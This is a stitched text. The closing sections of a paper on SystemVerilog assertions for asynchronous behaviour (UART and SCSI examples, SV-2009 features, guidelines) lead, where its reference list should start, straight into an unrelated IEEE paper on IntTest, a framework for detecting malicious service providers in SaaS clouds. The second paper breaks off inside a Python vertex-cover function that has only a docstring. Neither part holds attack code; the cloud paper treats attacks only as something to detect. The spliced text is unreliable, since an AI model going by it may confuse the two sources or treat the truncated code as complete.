Since a sampling clock is used, writing the assertion for the serial data transfer is very straightforward. The beginning of the transfer can be detected by using a sequence to wait for the RTS/CTS handshake:
```systemverilog
sequence handshake;
  @(posedge rts) 1 ##1 @(posedge cts) 1;
endsequence
```
The ##1 in this sequence performs the clock handover between the two signals. Recall from section 2.1.2 that using `@(posedge rts)` or `@(posedge cts)` alone does not work properly because the values of `rts` and `cts` will be sampled before the rising edge occurs.
To check that the data is sent correctly, a sequence with a local variable is used to capture each bit and then check the parity at the end of the sequence. The internal sampling clock is used to capture the bits:
```systemverilog
sequence check_trans;
  logic [7:0] tr;               // Local variable
  @(posedge sample_clk) 1 ##1   // Skip start bit
  (1, tr[0] = data) ##1 (1, tr[1] = data) ##1
  (1, tr[2] = data) ##1 (1, tr[3] = data) ##1
  (1, tr[4] = data) ##1 (1, tr[5] = data) ##1
  (1, tr[6] = data) ##1 (1, tr[7] = data) ##1
  data === ^tr ##1              // Check parity
  data === 1;                   // Check stop bit
endsequence
```
With the two sequences defined, the two can be synchronized using the non-overlapping implication operator to handover the clock between the sequences:
```systemverilog
assert property (handshake |=> check_trans);
```
Notice that by using multi-clock semantics, both the synchronous and asynchronous behaviors can easily work together, as illustrated in Figure 10.

SystemVerilog also defines the sequence method `.matched` that can be used to detect the end of a sequence sampled in a different clock domain. Using `.matched` instead, the assertion could have been written as:
```systemverilog
assert property (
  @(posedge sample_clk) handshake.matched |=> check_trans
);
```
The matched method retains the end state of the sequence until its next evaluation. No clock handover is required because the end state is simply sampled using `sample_clk`. The `.matched` method is often an easier way to describe clock domain crossing than matching sequence end points with the `intersect` operator as shown in Figure 9.
### 2.2.2.2 SCSI Interface Example
While the UART protocol operates asynchronously, data is still sent in a synchronous manner because both sides agree to a transmission frequency. Handshaking is used to start the transfer, but many other protocols use handshaking as their primary way to transfer data. The SCSI protocol is one such interface used primarily to transfer data to peripheral interfaces like hard disk drives. The SCSI protocol involves both an arbitration handshaking phase and an information transfer handshake (see Figure 11). For purposes of this paper, just the information transfer handshake will be considered.

The SCSI protocol passes messages and data, and uses the three signals C/D, I/O, and MSG to define the transfer type. The initiator requests a transfer using `REQ` and the receiver acknowledges with `ACK`. The data is transferred over differential pairs and is sampled upon arrival of the `ACK` signal.
A simple assertion check would be to check that the data sent by the initiator properly appears on the SCSI interface. The assertion should detect when the design is ready to transfer by synchronously sampling the design’s FSM and the data to be transferred. While the initiator will assert the `REQ` signal using its internal clock, it is just as easy to write a multi-clocked property to describe the `REQ/ACK` handshake. Using a local variable to capture the data, the data is then checked by the assertion on the data bus when the `ACK` signal arrives:
(SCSI is an acronym for Small Computer System Interface.)

```systemverilog
sequence data_cmd;   // Valid data command
  !cd & io & !msg;
endsequence

property check_data;
  data_t txdata;     // Local variable
  @(posedge clk)
  ( state == TX, txdata = datareg ) |=>
  @(posedge REQ) data_cmd ##1
  @(posedge ACK) databus == txdata;
endproperty

assert property ( check_data );
```
**Guideline 7:** An asynchronous interface can be handled using clock handover in the same way as clock domain crossing.
3. SV 1800-2009 ENHANCEMENTS
The Verilog (IEEE 1364-2005) and SystemVerilog (IEEE 1800-2005) standards have been merged into one unified document known as the SystemVerilog 2009 standard [4]. In addition to merging the two languages, many improvements have been made to the assertion language. This section offers a preview of some of the improvements that should have an impact on handling asynchronous behaviors as discussed in this paper (for a very good summary of SVA changes, refer to [1]).
3.1 Asynchronous abort properties
The SVA language defines `disable iff` to disable assertions and their actively evaluating threads. In the new standard, `disable iff` can be applied to assertions globally like the default clocking, making them more concise to write:

```systemverilog
default disable iff reset;
```

The `disable iff` statement has also been added to the new cover sequence statement:

```systemverilog
cover sequence ( @(event) disable iff ( expr )
  sequence_expr );
```
The cover sequence statement is used to record the number of times a sequence is _matched_ versus a cover property that records the number of times a property _succeeds_.
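As a hedged sketch of how these constructs fit together in a module (the module, clock, and signal names `clk`, `reset`, `req`, and `ack` are hypothetical, not from the paper):

```systemverilog
module m (input logic clk, reset, req, ack);
  // SV-2009: applies a disable condition to every assertion
  // in this scope, like a default clocking for clocks.
  default disable iff reset;
  default clocking cb @(posedge clk); endclocking

  // cover sequence records the number of times the sequence
  // itself is matched (not the number of property successes).
  cover sequence ( @(posedge clk) disable iff (reset)
                   req ##[1:3] ack );
endmodule
```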
The new standard has also introduced new constructs, called _abort properties_, that abort assertions in a similar way to `disable iff`. There are two asynchronous abort properties and two synchronous ones. The asynchronous abort properties take the form:

```systemverilog
accept_on ( expr ) property_expr
reject_on ( expr ) property_expr
```

where `expr` represents the _abort condition_. If the abort condition becomes true while the assertion is evaluating, then `accept_on` returns true or `reject_on` returns false; otherwise, `property_expr` is evaluated. A significant difference from `disable iff` is how the abort condition is evaluated. The expression used with `disable iff` uses the current simulation values (i.e., not sampled but level sensitive); whereas the abort condition for abort properties is sampled in the same way as other property values (i.e., in the Preponed region).
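For illustration, a minimal sketch of an asynchronous abort (the signal names `clk`, `start`, `cancel`, `req`, and `done` are hypothetical):

```systemverilog
// If 'cancel' becomes true while the property thread is active,
// accept_on forces that attempt to succeed immediately; reject_on
// would instead force a failure. Unlike disable iff, the abort
// condition is sampled in the Preponed region.
assert property ( @(posedge clk)
  start |-> accept_on (cancel) (req ##[1:5] done) );
```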
3.2 Global clocks
In section 2.1.2.1, synchronously checking using a fast clock was offered as a common solution for checking asynchronous behaviors. The SV-2009 standard defines the semantics for a global assertion clock, which could be used as a fast clock for sampling asynchronous signals. The global clock is defined by using the new keyword _global_ with an unnamed clocking block:
```systemverilog
global clocking @clk; endclocking
```
Once the global clock is defined, many new sample value functions are available:
<table>
<thead>
<tr>
<th>Past value functions</th>
<th>Future value functions</th>
</tr>
</thead>
<tbody>
<tr>
<td>$past_gclk(expr)</td>
<td>$future_gclk(expr)</td>
</tr>
<tr>
<td>$rose_gclk(expr)</td>
<td>$rising_gclk(expr)</td>
</tr>
<tr>
<td>$fell_gclk(expr)</td>
<td>$falling_gclk(expr)</td>
</tr>
<tr>
<td>$stable_gclk(expr)</td>
<td>$steady_gclk(expr)</td>
</tr>
<tr>
<td>$changed_gclk(expr)</td>
<td>$changing_gclk(expr)</td>
</tr>
</tbody>
</table>
These sample value functions provide new ways to define properties to match asynchronous behaviors.
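As a sketch of how these functions might be applied once a global clock is defined (the clock and signal names `fast_clk`, `async_sig`, and `enable` are hypothetical):

```systemverilog
// Define the global assertion clock (SV-2009).
global clocking @(posedge fast_clk); endclocking

// $changed_gclk is true when the expression changed relative to
// the previous global clock tick, giving a fast-clock view of an
// otherwise asynchronous signal.
assert property ( @($global_clock)
  $changed_gclk(async_sig) |-> enable );
```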
3.3 Procedural concurrent assertions
Generally, concurrent assertions are written to stand by themselves, but they can also be embedded inside of initial and
always blocks. Inside a procedural block, the event control and enabling conditions are inferred from the context if not declared explicitly. While procedural concurrent assertions are evaluated in the simulator’s Observed region ([3], section 17.3), the inputs are sampled as other concurrent assertions in the Preponed region. This poses the same issues when checking asynchronous control signals as discussed in section 2.1, and requires the same solutions presented in section 2.1.2.3.
However, the SV-2009 standard has greatly enhanced the semantics for procedural concurrent assertions. All procedural concurrent assertion inputs are still sampled in the Preponed region save for one exception—inputs declared as const or automatic variables. With const and automatic variables, their values are sampled when the assertion is placed on the assertion queue, effectively causing it to sample its inputs as immediate assertions. For example, the asynchronous reset assertion for the counter example could be written as:
```systemverilog
always @(posedge Reset)
assert property (const'(Q) == 0);
```
An automatic variable will also be treated as a constant and its immediate value used. For example, the assertion could be written as:
```systemverilog
always @(posedge Reset)
begin
automatic byte q = Q;
assert property (q == 0);
end
```
Unfortunately, this feature does not eliminate the difficulty of sampled values with concurrent assertions. The evaluation of the assertion is delayed until the simulation’s Observed region, but the immediate value used for the constant and automatic inputs is taken when the procedural concurrent assertion is scheduled. Inside a module, always and initial blocks execute in the simulator’s Active region, so the assertion will be scheduled in the Active region before the design has updated the value of Q upon reset in the NBA region. In order to make this new feature work, either a timing control would be required before the assertion to delay its scheduling—which is explicitly prohibited by the standard—or the procedural concurrent assertion could be used inside a program block to delay its scheduling until the Reactive region (see section 2.1.2.2).
Another change that may benefit describing asynchronous behavior is how the enabling condition for procedural concurrent assertions is handled. For example, an if statement could be used around a procedural concurrent assertion:
```systemverilog
always @(posedge clk)
if (a) // Enabling condition
assert property (check_data);
```
In the current SV-2005 standard, the values used for the enabling condition are sampled in the same manner as the assertion inputs. According to the SV-2009 standard, the enabling conditions will use the immediate values just like constant and automatic inputs. If used in a program block, this will provide another means of checking behavior after the asynchronous signal(s) occur.
### 3.4 Checkers
The SV-2009 standard introduces a new verification block known as a checker. A checker can contain assertions, covergroups, procedural blocks of code, and generate statements much like a module, but modules, programs, interfaces, or packages cannot be instantiated within a checker. Checkers can be used most anywhere a concurrent assertion is used with the exception of fork-join statements. Checkers can also be passed arguments, which will work very much the same as procedural concurrent assertions. If a checker’s arguments are declared as const or automatic, then the immediate values from the checker’s context will be passed. As with procedural concurrent assertions, checkers could be adapted to check asynchronous behaviors if used in the same manner described in the previous section. For an in-depth look at checkers, refer to [1].
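A minimal sketch of a checker with a const argument follows; the checker name, event, and signal names are hypothetical, and the exact formal-argument syntax is an assumption based on the description above rather than verified SV-2009 code:

```systemverilog
// Hypothetical checker: per the text, a const formal receives the
// immediate value from the instantiation context when the checker's
// assertion is scheduled, like a procedural concurrent assertion.
checker reset_check (event rst_ev, const logic [7:0] q);
  always @(rst_ev)
    assert property (q == 0);
endchecker
```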
#### 3.5 Deferred Immediate Assertions
Deferred assertions are immediate assertions that are delayed in their reporting. The purpose of a deferred assertion is to avoid false failures due to glitches on combinational circuitry. The SV-2009 standard defines the semantics for deferred assertions so that their evaluation works like an immediate assertion, but their action blocks report in the Reactive region. A deferred assertion may be used within or outside of a procedural block and is written as follows:
```systemverilog
assert #0 (expression) pass_action_block else failure_action_block;
```
A deferred assertion follows the same form as an immediate assertion but with the additional #0 notation. Since deferred assertions sample their inputs as regular immediate assertions, the deferred assertions evaluation would need to be delayed to handle asynchronous events as shown previously in this paper (see 2.1.2.2).
### 4. CONCLUSION
In this paper, SystemVerilog assertions have been examined in detail for their ability to describe and check asynchronous behaviors. The harder asynchronous behaviors to check are the asynchronous control signals that immediately affect the design, such as enables and resets. The difficulty lies in how the assertion inputs are sampled preceding the asynchronous trigger. This difficulty can be overcome by using the following guidelines:
- **Guideline 1:** Always use disable iff to asynchronously terminate active assertions threads.
- **Guideline 2:** Delay either the evaluation of the checking or the sampling of the assertion inputs.
- **Guideline 3:** Immediate assertions can check asynchronous events if evaluated in the Observed or Reactive simulation regions.
- **Guideline 4:** Concurrent assertions can check asynchronous events by delaying the asynchronous control or calling a subroutine from a matched sequence.
- **Guideline 5:** For timing simulations, synchronously checking the design’s behavior upon the asynchronous event is probably the best overall solution.
The second class of asynchronous behaviors is communication between modules. The sender and receiver both operate synchronously, but since they do not pass a clock, the communication becomes asynchronous, and the information must either be sampled synchronously or transferred with a handshaking scheme. Checking asynchronous communication can be treated as nothing more than an SVA multi-clocked sequence. SystemVerilog has well-defined semantics for clock handover and clock flow through a sequence, so the difficulty lies in synchronizing between the two clock domains. With proper clock handover, writing sequences to check asynchronous communication is a straightforward task. Handling asynchronous communication can be summarized using the following guidelines:
- **Guideline 6**: Clock domain crossing is handled using `|=>` or `##1` for clock handover.
- **Guideline 7**: An asynchronous interface can be handled using clock handover in the same way as clock domain crossing.
Coverage can also be measured using these techniques. While not discussed in this paper, the same assertion properties can be used by cover property and the same asynchronous behaviors recorded. By following these simple guidelines, most—if not all—kinds of asynchronous behaviors can be properly handled, increasing overall verification confidence.
5. ACKNOWLEDGEMENTS
I would like to thank and acknowledge the excellent engineers at Doulos who have developed the SystemVerilog and SVA training courses. In particular, I have borrowed diagrams from the SV scheduling and multi-clock assertion materials.
Many thanks to my former colleague, Jonathan Bromley (Verilabs), who has provided incredible insights and invaluable comments in reviewing this paper. As always, Jonathan has an incredible depth of knowledge and understanding of SystemVerilog, and challenges me to research my ideas to much greater depths.
Also, many thanks to Matt Homiller (Sun Microsystems) for his review and comments of this paper, and special thanks to Scott Little and John Havlicek (Freescale) for their many helpful comments and corrections.
6. REFERENCES
Scalable Distributed Service Integrity Attestation for Software-as-a-Service Clouds
Juan Du, Member, IEEE, Daniel J. Dean, Student Member, IEEE, Yongmin Tan, Member, IEEE, Xiaohui Gu, Senior Member, IEEE, Ting Yu, Member, IEEE
Abstract—Software-as-a-Service (SaaS) cloud systems enable application service providers to deliver their applications via massive cloud computing infrastructures. However, due to their sharing nature, SaaS clouds are vulnerable to malicious attacks. In this paper, we present IntTest, a scalable and effective service integrity attestation framework for SaaS clouds. IntTest provides a novel integrated attestation graph analysis scheme that can provide stronger attacker pinpointing power than previous schemes. Moreover, IntTest can automatically enhance result quality by replacing bad results produced by malicious attackers with good results produced by benign service providers. We have implemented a prototype of the IntTest system and tested it on a production cloud computing infrastructure using IBM System S stream processing applications. Our experimental results show that IntTest can achieve higher attacker pinpointing accuracy than existing approaches. IntTest does not require any special hardware or secure kernel support and imposes little performance impact to the application, which makes it practical for large-scale cloud systems.
Index Terms—Distributed Service Integrity Attestation, Cloud Computing, Secure Distributed Data Processing
1 INTRODUCTION
Cloud computing has emerged as a cost-effective resource leasing paradigm, which obviates the need for users to maintain complex physical computing infrastructures by themselves. Software-as-a-Service (SaaS) clouds (e.g., Amazon Web Services [1], Google AppEngine [2]) build upon the concepts of Software as a Service (SaaS) [3] and Service Oriented Architecture (SOA) [4], [5], which enable application service providers (ASPs) to deliver their applications via the massive cloud computing infrastructure. In particular, our work focuses on data stream processing services [6]–[8] that are considered to be one class of killer applications for clouds, with many real-world applications in security surveillance, scientific computing, and business intelligence.
However, cloud computing infrastructures are often shared by ASPs from different security domains, which makes them vulnerable to malicious attacks [9], [10]. For example, attackers can pretend to be legitimate service providers to provide fake service components, and the service components provided by benign service providers may include security holes that can be exploited by attackers. Our work focuses on service integrity attacks that cause the user to receive untruthful data processing results, as illustrated by Figure 1. Although confidentiality and privacy protection problems have been extensively studied by previous research [11]–[16], the service integrity attestation problem has not been properly addressed. Moreover, service integrity is the most prevalent problem, which needs to be addressed no matter whether public or private data are processed by the cloud system.
Although previous work has provided various software integrity attestation solutions [9], [17]–[19], [19]–[23], those techniques often require special trusted hardware or secure kernel support, which makes them difficult to be deployed on large-scale cloud computing infrastructures. Traditional Byzantine fault tolerance (BFT) techniques [24], [25] can detect arbitrary misbehaviors using full time majority voting over all replicas, which however incur high overhead to the cloud system. A detailed discussion of the related work can be found in section 5 of the online supplementary material.
In this paper, we present IntTest, a new integrated service integrity attestation framework for multi-tenant cloud systems. IntTest provides a practical service integrity attestation scheme that does not assume trusted entities on third-party service provisioning sites or require application modifications. IntTest builds upon our previous work RunTest [26] and AdapTest [27] but can provide stronger malicious attacker pinpointing power than RunTest and AdapTest. Specifically, both RunTest and AdapTest, as well as traditional majority voting schemes, need to assume that benign service providers are in the majority for every service function. However, in large-scale multi-tenant cloud systems, multiple malicious attackers may launch colluding attacks on certain targeted service functions to invalidate this assumption. To address this challenge, IntTest takes a holistic approach by systematically examining both consistency and inconsistency relationships among different service providers within the entire cloud system. IntTest examines both per-function consistency graphs and the global inconsistency graph. The per-function consistency graph analysis can limit the scope of damage caused by colluding attackers, while the global inconsistency graph analysis can effectively expose those attackers that try to compromise many service functions. Hence, IntTest can still pinpoint malicious attackers even if they become the majority for some service functions.
By taking an integrated approach, IntTest can not only pinpoint attackers more efficiently but also can suppress aggressive attackers and limit the scope of the damage caused by colluding attacks. Moreover, IntTest provides result auto-correction that can automatically replace corrupted data processing results produced by malicious attackers with good results produced by benign service providers. Specifically, this paper makes the following contributions:
- We provide a scalable and efficient distributed service integrity attestation framework for large-scale cloud computing infrastructures.
- We present a novel integrated service integrity attestation scheme that can achieve higher pinpointing accuracy than previous techniques.
- We describe a result auto-correction technique that can automatically correct the corrupted results produced by malicious attackers.
- We conduct both analytical study and experimental evaluation to quantify the accuracy and overhead of the integrated service integrity attestation scheme.
We have implemented a prototype of the IntTest system and tested it on NCSU’s virtual computing lab (VCL) [28], a production cloud computing infrastructure that operates in a similar way as the Amazon elastic compute cloud (EC2) [29]. The benchmark applications we use to evaluate IntTest are distributed data stream processing services provided by the IBM System S stream processing platform [8], [30], an industry strength data stream processing system. Experimental results show that IntTest can achieve more accurate pinpointing than existing schemes (e.g. RunTest, AdapTest, full time majority voting) under strategically colluding attacks. IntTest is scalable, and can reduce the attestation overhead by more than one order of magnitude compared to the traditional full time majority voting scheme.
The rest of the paper is organized as follows. Section 2 presents our system model. Section 3 presents the design details. Section 4 provides an analytical study about the IntTest system. Section 5 presents the experimental results. Section 6 summarises the limitations of our approach. Finally, the paper concludes in Section 7.
2 PRELIMINARY
In this section, we first introduce the software-as-a-service (SaaS) cloud system model. We then describe our problem formulation including the service integrity attack model and our key assumptions. Table 1 summarizes all the notations used in this paper.
2.1 SaaS Cloud System Model
SaaS cloud builds upon the concepts of Software as a Service (SaaS) [3] and Service Oriented Architecture (SOA) [4], [5], which allows application service providers (ASPs) to deliver their applications via large-scale cloud computing infrastructures. For example, both Amazon Web Service (AWS) and Google AppEngine provide a set of application services supporting enterprise applications and big data processing. A distributed application service can be dynamically composed from individual service components provided by different ASPs ($p_i$) [31], [32]. For example, a disaster assistance claim processing application [33] consists of voice-over-IP (VoIP) analysis component, email analysis component, community discovery component, clustering and join components. Our work focuses on data processing services [6], [8], [34], [35] which have become increasingly popular with applications in many real world usage domains such as business intelligence, security surveillance, and scientific computing.
Each service component, denoted by $c_i$, provides a specific data processing function, denoted by $f_i$, such as sorting, filtering, correlation, or data mining utilities. Each service component can have one or more input ports for receiving input data tuples, denoted by $d_i$, and one or more output ports to emit output tuples.
<table>
<thead>
<tr>
<th>notation</th>
<th>meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>$p_i$</td>
<td>service provider</td>
</tr>
<tr>
<td>$f_i$</td>
<td>service function</td>
</tr>
<tr>
<td>$c_i$</td>
<td>service component</td>
</tr>
<tr>
<td>$d_i$</td>
<td>application data tuple</td>
</tr>
<tr>
<td>$P_u$</td>
<td>attestation probability</td>
</tr>
<tr>
<td>$r$</td>
<td>number of copies for a tuple</td>
</tr>
<tr>
<td>$K$</td>
<td>Max number of malicious service providers</td>
</tr>
<tr>
<td>$G_G$</td>
<td>minimum vertex cover of graph $G$</td>
</tr>
<tr>
<td>$N_p$</td>
<td>the neighbor set of node $p$</td>
</tr>
<tr>
<td>$G_p$</td>
<td>the residual graph of $G$</td>
</tr>
<tr>
<td>$\Omega$</td>
<td>the set of malicious service providers identified by the global inconsistency graph</td>
</tr>
<tr>
<td>$M_i$</td>
<td>the set of malicious service providers identified by consistency graph in service function $f_i$</td>
</tr>
</tbody>
</table>
**TABLE 1**
Notations.
In a large-scale SaaS cloud, the same service function can be provided by different ASPs. Those functionally-equivalent service components exist because: i) service providers may create replicated service components for load balancing and fault tolerance purposes; and ii) popular services may attract different service providers for profit. To support automatic service composition, we can deploy a set of portal nodes [31], [32] that serve as the gateway for the user to access the composed services in the SaaS cloud. The portal node can aggregate different service components into composite services based on the user’s requirements. For security protection, the portal node can perform authentication on users to prevent malicious users from disturbing normal service provisioning.
Different from other open distributed systems such as peer-to-peer networks and volunteer computing environments, SaaS cloud systems possess a set of unique features. First, third-party ASPs typically do not want to reveal the internal implementation details of their software services for intellectual property protection. Thus, it is difficult to only rely on challenge-based attestation schemes [20], [36], [37] where the verifier is assumed to have certain knowledge about the software implementation or have access to the software source code. Second, both the cloud infrastructure provider and third-party service providers are autonomous entities. It is impractical to impose any special hardware or secure kernel support on individual service provisioning sites. Third, for privacy protection, only portal nodes have global information about which service functions are provided by which service providers in the SaaS cloud. Neither cloud users nor individual ASPs have the global knowledge about the SaaS cloud such as the number of ASPs and the identifiers of the ASPs offering a specific service function.
### 2.2 Problem Formulation
Given an SaaS cloud system, the goal of IntTest is to pinpoint any malicious service provider that offers an untruthful service function. IntTest treats all service components as black-boxes, which does not require any special hardware or secure kernel support on the cloud platform. We now describe our attack model and our key assumptions as follows.
**Attack model.** A malicious attacker can pretend to be a legitimate service provider or take control of vulnerable service providers to provide untruthful service functions. Malicious attackers can be stealthy, which means they can misbehave on a selective subset of input data or service functions while pretending to be benign service providers on other input data or functions. The stealthy behavior makes detection more challenging due to the following reasons: 1) the detection scheme needs to be hidden from the attackers to prevent attackers from gaining knowledge on the set of data processing results that will be verified and therefore easily escaping detection; 2) the detection scheme needs to be scalable while being able to capture misbehavior that may be both unpredictable and occasional.
In a large-scale cloud system, we need to consider colluding attack scenarios where multiple malicious attackers collude or multiple service sites are simultaneously compromised and controlled by a single malicious attacker. Attackers could sporadically collude, which means an attacker can collude with an arbitrary subset of colluders at any time. We assume that malicious nodes have no knowledge of other nodes except those they interact with directly. However, attackers can communicate with their colluders in an arbitrary way. Attackers can also change their attacking and colluding strategies arbitrarily.
**Assumptions.** We first assume that the total number of malicious service components is less than the total number of benign ones in the entire cloud system. Without this assumption, it would be very hard, if not totally impossible, for any attack detection scheme to work when comparable ground truth processing results are not available. However, different from RunTest, AdapTest, or any previous majority voting schemes, IntTest does not assume benign service components have to be the majority for every service function, which will greatly enhance our pinpointing power and limit the scope of service functions that can be compromised by malicious attackers.
Second, we assume that the data processing services are input-deterministic, that is, given the same input, a benign service component always produces the same or similar output (based on a user defined similarity function). Many data stream processing functions fall into this category [8]. We can also easily extend our attestation framework to support stateful data processing services [38], which however is outside the scope of this paper.
Third, we also assume that the result inconsistency caused by hardware or software faults can be marked by fault detection schemes [39] and are excluded from our malicious attack detection.
### 3 Design and Algorithms
In this section, we first present the basis of the IntTest system: probabilistic replay-based consistency check and the integrity attestation graph model. We then describe the integrated service integrity attestation scheme in detail. Next, we present the result auto-correction scheme.
#### 3.1 Baseline Attestation Scheme
In order to detect service integrity attack and pinpoint malicious service providers, our algorithm relies on *replay-based consistency check* to derive the
consistency/inconsistency relationships between service providers. For example, Figure 2 shows the consistency check scheme for attesting three service providers $p_1$, $p_2$, and $p_3$ that offer the same service function $f$. The portal sends the original input data $d_1$ to $p_1$ and gets back the result $f(d_1)$. Next, the portal sends $d_1'$, a duplicate of $d_1$ to $p_3$ and gets back the result $f(d_1')$. The portal then compares $f(d_1)$ and $f(d_1')$ to see whether $p_1$ and $p_3$ are consistent.
The intuition behind our approach is that if two service providers disagree with each other on the processing result of the same input, at least one of them should be malicious. Note that we do not send an input data item and its duplicates (i.e., attestation data) concurrently. Instead, we replay the attestation data on different service providers after receiving the processing result of the original data. Thus, the malicious attackers cannot avoid the risk of being detected when they produce false results on the original data. Although the replay scheme may cause delay in a single tuple processing, we can overlap the attestation and normal processing of consecutive tuples in the data stream to hide the attestation delay from the user.
If two service providers always give consistent output results on all input data, there exists a consistency relationship between them. Otherwise, if they give different outputs on at least one input data item, there is an inconsistency relationship between them. We do not limit the consistency relationship to an equality function, since two benign service providers may produce similar but not exactly identical results. For example, the credit scores for the same person may vary by a small difference when obtained from different credit bureaus. We allow the user to define a distance function to quantify the largest tolerable result difference.
Definition 1: For two output results, $r_1$ and $r_2$, which come from two functionally equivalent service providers respectively, Result Consistency is defined as either $r_1 = r_2$, or the distance between $r_1$ and $r_2$ according to user-defined distance function $D(r_1, r_2)$ falls within a threshold $\delta$.
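As an illustrative sketch (names and structure are ours, not the paper's implementation), the consistency predicate of Definition 1 can be written as:

```python
def results_consistent(r1, r2, distance=None, delta=0.0):
    """Definition 1: results are consistent if they are equal, or if a
    user-defined distance function reports a difference within delta."""
    if r1 == r2:
        return True
    if distance is None:
        return False
    return distance(r1, r2) <= delta

# Credit-score example from the text: scores within 10 points count as consistent.
def score_distance(a, b):
    return abs(a - b)
```

With `score_distance` and `delta = 10`, scores of 500 and 505 are consistent while 500 and 550 are not, matching the credit-score example used later in the text.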
For scalability, we propose randomized probabilistic attestation, a technique that randomly replays a subset of input data for consistency check. For composite dataflow processing services consisting of multiple service hops, each service hop is composed of a set of functionally equivalent service providers. Specifically, for an incoming tuple $d_i$, the portal may decide to perform integrity attestation with probability $P_u$. If the portal decides to perform attestation on $d_i$, the portal first sends $d_i$ to a predefined service path $p_1 \rightarrow p_2 \ldots \rightarrow p_l$ providing functions $f_1 \rightarrow f_2 \ldots \rightarrow f_l$. After receiving the processing result for $d_i$, the portal replays the duplicate(s) of $d_i$ on alternative service path(s) such as $p_1' \rightarrow p_2' \ldots \rightarrow p_l'$, where $p_j'$ provides the same function $f_j$ as $p_j$. The portal may replay data on multiple service providers to perform concurrent attestation.
After receiving the attestation results, the portal compares each intermediate result between pairs of functionally equivalent service providers $p_i$ and $p_i'$. If $p_i$ and $p_i'$ receive the same input data but produce different output results, we say that $p_i$ and $p_i'$ are inconsistent. Otherwise, we say that $p_i$ and $p_i'$ are consistent with regard to function $f_i$. For example, let us consider two different credit score service providers $p_1$ and $p_1'$. Suppose the distance function deems two credit scores consistent if they differ by no more than 10. If $p_1$ outputs 500 and $p_1'$ outputs 505 for the same person, we say $p_1$ and $p_1'$ are consistent. However, if $p_1$ outputs 500 and $p_1'$ outputs 550 for the same person, we would consider $p_1$ and $p_1'$ to be inconsistent. We evaluate both intermediate and final data processing results between functionally equivalent service providers to derive the consistency/inconsistency relationships. For example, if data processing involves a sub-query to a database, we evaluate both the final data processing result and the intermediate sub-query result. Note that although we do not attest all service providers at the same time, all service providers will be covered by the randomized probabilistic attestation over a period of time.
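A minimal sketch of the replay-based probabilistic attestation loop, assuming single-hop services; the `providers` mapping and function names are illustrative stand-ins for remote service calls, not the paper's implementation:

```python
import random

def attest_stream(tuples, providers, P_u=0.2, seed=7):
    """Sketch of randomized probabilistic attestation for one service hop.
    With probability P_u, the portal replays a duplicate of the tuple on a
    randomly chosen alternative provider AFTER the original result is
    received, and records whether the pair agreed."""
    rng = random.Random(seed)
    observations = []  # (provider_a, provider_b, consistent?)
    ids = sorted(providers)
    for d in tuples:
        primary = ids[0]                      # provider on the normal path
        out = providers[primary](d)
        if rng.random() < P_u:
            alternate = rng.choice(ids[1:])   # replay on an alternative
            out2 = providers[alternate](d)
            observations.append((primary, alternate, out == out2))
    return observations
```

Because the duplicate is replayed only after the original result returns, a provider that cheats on the original data cannot avoid the risk of a later consistency check, as the text explains.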
With replay-based consistency check, we can test functionally equivalent service providers and obtain their consistency and inconsistency relationships. We employ both the consistency graph and inconsistency graph to aggregate pair-wise attestation results for further analysis. The graphs reflect the consistency/inconsistency relationships across multiple service providers over a period of time. Before introducing the attestation graphs, we first define consistency links and inconsistency links.
Definition 2: A consistency link exists between two service providers who always give consistent output for the same input data during attestation. An inconsistency link exists between two service providers who give at least one inconsistent output for the same input data during attestation.
We then construct consistency graphs for each function to capture consistency relationships among the service providers provisioning the same function. Figure 3(a) shows the consistency graphs for two functions. Note that two service providers that are consistent for one function are not necessarily consistent for another function. This is the reason why we confine consistency graphs within individual functions.
Definition 3: A per-function consistency graph is an undirected graph, with all the attested service providers that provide the same service function as the vertices and consistency links as the edges.
We use a global inconsistency graph to capture inconsistency relationships among all service providers. Two service providers are said to be inconsistent as long as they disagree in any function. Thus, we can derive more comprehensive inconsistency relationships by integrating inconsistency links across functions. Figure 3(b) shows an example of the global inconsistency graph. Note that service provider $p_5$ provides both functions $f_1$ and $f_2$. In the inconsistency graph, there is a single node $p_5$ with its links reflecting inconsistency relationships in both functions.
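The two attestation graphs can be derived from pairwise attestation outcomes roughly as follows (a sketch; the observation tuple format is an assumption of ours):

```python
from collections import defaultdict

def build_attestation_graphs(observations):
    """Build per-function consistency graphs and the global inconsistency
    graph from outcomes of the form (function, provider_a, provider_b,
    consistent?). Per Definition 2, a consistency link survives only if the
    pair never disagreed on that function, while a single disagreement in
    any function creates a global inconsistency link."""
    agreed = defaultdict(set)      # function -> pairs observed consistent
    disagreed = defaultdict(set)   # function -> pairs observed inconsistent
    global_inconsistency = set()   # pairs inconsistent in ANY function
    for fn, a, b, ok in observations:
        pair = frozenset((a, b))
        (agreed if ok else disagreed)[fn].add(pair)
        if not ok:
            global_inconsistency.add(pair)
    consistency = {fn: pairs - disagreed[fn] for fn, pairs in agreed.items()}
    return consistency, global_inconsistency
```

Note how a pair that disagrees in one function still keeps its consistency link in another function's graph, while the global inconsistency graph aggregates disagreements across all functions, as described above.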
**Step 1: Per-function consistency graph analysis.** The consistency links in the per-function consistency graphs tell us which sets of service providers keep consistent with each other on a specific service function. For any service function, since benign service providers always keep consistent with each other, they always form a consistency clique; for example, in Figure 3(a), the benign providers of each function form such a clique. However, colluding malicious service providers can form consistency cliques as well, and we do not assume that benign providers are the majority for every function. Thus, it is insufficient to examine the per-function consistency graphs only. We need to integrate the consistency graph analysis with the inconsistency graph analysis to achieve more robust integrity attestation.
**Step 2: Inconsistency graph analysis.** Given an inconsistency graph containing only the inconsistency links, there may exist different possible combinations of the benign node set and the malicious node set. However, if we assume that the total number of malicious service providers in the whole system is no more than $K$, we can pinpoint a subset of truly malicious service providers. Intuitively, given two service providers connected by an inconsistency link, we can say that at least one of them is malicious, since any two benign service providers should always agree with each other. Thus, we can derive a lower bound on the number of malicious service providers by examining the minimum vertex cover of the inconsistency graph. The minimum vertex cover of a graph is a minimum set of vertices such that each edge of the graph is incident to at least one vertex in the set. For example, in Figure 3(b), $p_2$ and $p_5$ form a minimum vertex cover. We present two propositions as part of our approach. The proofs for these propositions can be found in section 1 of the online supplementary material.
Proposition 1: Given an inconsistency graph $G$, let $C_G$ be a minimum vertex cover of $G$. Then the number of malicious service providers is no less than $|C_G|$.
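Proposition 1's lower bound is the size of a minimum vertex cover, which for the small example graphs in the text can be computed exactly by exhaustive search (minimum vertex cover is NP-hard in general, so a real deployment would use an approximation; the edge set below is illustrative):

```python
from itertools import combinations

def min_vertex_cover(edges):
    """Exact minimum vertex cover by exhaustive search over subsets,
    smallest first. Only suitable for example-sized graphs."""
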